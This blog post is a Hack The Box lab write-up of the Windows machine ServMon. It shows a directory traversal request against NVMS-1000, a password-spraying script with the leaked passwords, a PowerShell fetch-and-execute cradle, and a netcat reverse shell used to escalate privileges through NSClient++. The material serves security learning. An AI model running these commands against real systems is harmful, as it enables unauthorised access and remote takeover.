Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

ServMon

Name: ServMon
Release Date: 11 Apr 2020
Retire Date: 20 Jun 2020
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
sampriti 00 days, 03 hours, 08 mins, 02 seconds
sampriti 00 days, 03 hours, 34 mins, 10 seconds
Creator: dmw0ng
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184

 
$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 10:02 EDT                                 
Nmap scan report for 10.10.10.184                                                               
Host is up (0.025s latency).                                                                    
Not shown: 65517 closed ports                                                                   
PORT      STATE SERVICE       VERSION                                                           
21/tcp    open  ftp           Microsoft ftpd                                                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                          
|_01-18-20  12:05PM                 Users                                                  
| ftp-syst:                                                                                     
|_  SYST: Windows_NT                                                                            
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)                            
| ssh-hostkey:                                                                                  
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)                                  
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)                                 
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)                               
80/tcp    open  http                                                                            
| fingerprint-strings:                                                                          
|   GetRequest, HTTPOptions, RTSPRequest:                                                       
|     HTTP/1.1 200 OK                                                                           
|     Content-type: text/html                                                                   
|     Content-Length: 340                                                                       
|     Connection: close                                                                         
|     AuthInfo:                                                                                 
|     
|     

|     

|     
|     
|     

|     

|     

|     

|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  tcpwrapped
8443/tcp  open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at
 https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=7/16%Time=5F105E2D%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbfx20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n\r\n
\r\n\x20\x20\x20\x20\r\n\x20\
SF:x20\x20\x20\r\n
\r\n
\r\n
\r\n
\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbfx20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\ SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh SF:tml1-transitional\.dtd\">\r\n\r\n\r\n
\r\n\x20\x20\x20\x20\r\n\x20\x20\x SF:20\x20\r\n
\r\n
\r\n
\r\n\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbfx20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\ SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1- SF:transitional\.dtd\">\r\n\r\n\r\n
\r\n\x20\x20\x20\x20\r\n\x20\x20\x20\x2 SF:0\r\n
\r\n
\r\n
\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=7/16%Time=5F105E35%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\ SF:x18\xa3\x13\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length: SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1 SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng SF:th:\x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m22s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-16T14:08:26 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 224.99 seconds

We've got everything open on this one.  FTP, SSH, HTTP, RPC, HTTPS on 8443 and a bunch more.  Let's start with FTP.  It looks like Anonymous login is allowed.  So, let's see what goodies are accessible.  It looks like there are 2 folders in Users (Nadine and Nathan) with 1 TXT file each.  Get them.

The one on Nadine's folder says:

 

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

And Nathan's says:

 

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

 

That appears to be everything we can get from FTP.  Let's take a look at the HTTP site, which is the NVMS-1000 CCTV/NVR style surveillance system.  Don't bother with trying Default Credentials.  I already tried and failed.  I can't seem to get anything working on HTTP.  Let's jump to HTTPS and see if we have better luck.  That appears to be NSCLient++ (whatever that is).  Let's searchsploit NVMS and see if something jumps out.

OK.  We have some directory traversal possibilities here.  The 47774.txt (also found here) basically says intercept the main page HTTP GET request and change the target.  Time to fire up BurpSuite.  Intercept and send it to Repeater, change the GET string to "/../../../../../../../../../../../../windows/win.ini HTTP/1.1" and fire away.

Vulnerability Confirmed.  The Confidential.txt file on Nadine's FTP folder says she put the passwords on Nathan's Desktop.  So, let's try "GET"ting them.  We change the GET string again, this time to:

 

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

 

And we get the list of passwords on Nathan's Desktop.

The list is:

 

1nsp3ctTh3Way2Mars!

Th3r34r3To0M4nyTrait0r5!

B3WithM30r4ga1n5tMe

L1k3B1gBut7s@W0rk

0nly7h3y0unGWi11F0l10w

IfH3s4b0Utg0t0H1sH0me

Gr4etN3w5w17hMySk1Pa5$

 

And we should be able to perform a password spray attack on.....well, everything. To start, create a users.txt file with administrator, Nathan, and Nadine in it.  Create a passwords.txt file with the list above in it.  It's a little funky, but here's the quick and dirty bash script for it.

 
#!/bin/bash

for u in $(cat users.txt); do	
		echo -n "[*] user: $u" &&
		for p in $(cat passwords.txt); do
				echo "$u % $p"			
				rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184
		done
done

RESULT:

$ ./spray.sh 
[*] user: administratoradministrator % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % L1k3B1gBut7s@W0rk
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
administrator % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user: NathanNathan % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % L1k3B1gBut7s@W0rk
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nathan % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user: NadineNadine % 1nsp3ctTh3Way2Mars!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % B3WithM30r4ga1n5tMe
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % L1k3B1gBut7s@W0rk
Account Name: Nadine, Authority Name: SERVMON
Nadine % 0nly7h3y0unGWi11F0l10w
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Nadine % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Notice when it got to Nadine % L1k3B1gBut7s@W0rk that it replied Account Name: Nadine, Authority Name: SERVMON.  That's a successful connection.  We just got Nadine's credentials.  SSH with that and we've got ourselves a foothold.  Now, you can use the ssh_login module in Metasploit located auxiliary/scanner/ssh/ssh_login, but again MSF makes us lazy!  Moving on. Looking around on the box (and since we already know NVMS and NSClient++ are on this machine) I find the NSClient.ini file that, surprise, has another password of "ew2x6SsGTxjRwXOT".  Unfortunately, it also shows that we can only access it from the localhost, which is not very helpful right now.  Let's keep looking.

What version of NSClient is running?


nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64


OH! Now we're getting somewhere!  There is a Privilege Escalation path with NSClient++ version 0.5.2.35 located here.  Obviously, we don't want to reboot the system like the exploit states, but we will need to restart the service.  Let's see if we can do that.  Performing a little bit of Google Fu, we can find https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ that has a nice PowerShell script that will do it for us.  We just need to get it to the target. We do that using Msxml2.XMLHTTP COM.

 

$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText

 

and then running it with

 

Get-Service nscp | fl *

And with CanStop being set to True, that means we CAN restart the service.  We need to see that 8443 page, but only localhost can.....let's try an ssh tunnel.

 

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

 

Then we should be able to log in with the password found in the INI file on the https://localhost:8443 page.

Now we just follow the directions from the ExploitDB page.  I change to the Temp directory and get Netcat over to the box.

Next, create the bat:

 

C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe

 

and move it to the target the same way.

 

PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")

 

After verifying that Netcat and our malicious bat file are in place, Restart the NSCP service.

Now, go to the Client webpage, Navigate to Settings > External Scripts > Scripts and hit Add New

In Section, give it a name (I used shell), in Key put command, and in Value set the path to our Batch file.

Once you add it, the Changes button at the top will change to red.  Select it and hit Save Configuration.

Now that you have it added, restart the NSCP service with:

 

sc.exe stop ncsp

sc.exe start ncsp

 

Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient Page and go to Console. Under the logs is an input box.  Type in the name of the script you added (in my case shell) and hit Run.  Check your Netcat listener.  Administrator Shell.